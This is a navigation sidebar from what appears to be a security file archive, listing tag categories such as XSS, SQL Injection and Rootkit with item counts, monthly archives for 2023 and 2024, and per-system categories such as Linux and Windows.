*   File Upload (1,022)
*   Firewall (822)
*   Info Disclosure (2,924)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,310)
*   Local (14,864)
*   Magazine (587)
*   Overflow (13,228)
*   Perl (1,435)
*   PHP (5,284)
*   Proof of Concept (2,413)
*   Protocol (3,751)
*   Python (1,662)
*   Remote (31,922)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,052)
*   Shell (3,308)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,738)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,133)
*   Web (10,144)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,306)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,130)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,374)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,912)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,882)
*   UNIX (9,461)
*   UnixWare (188)
*   Windows (6,780)
*   Other

Tag

#windows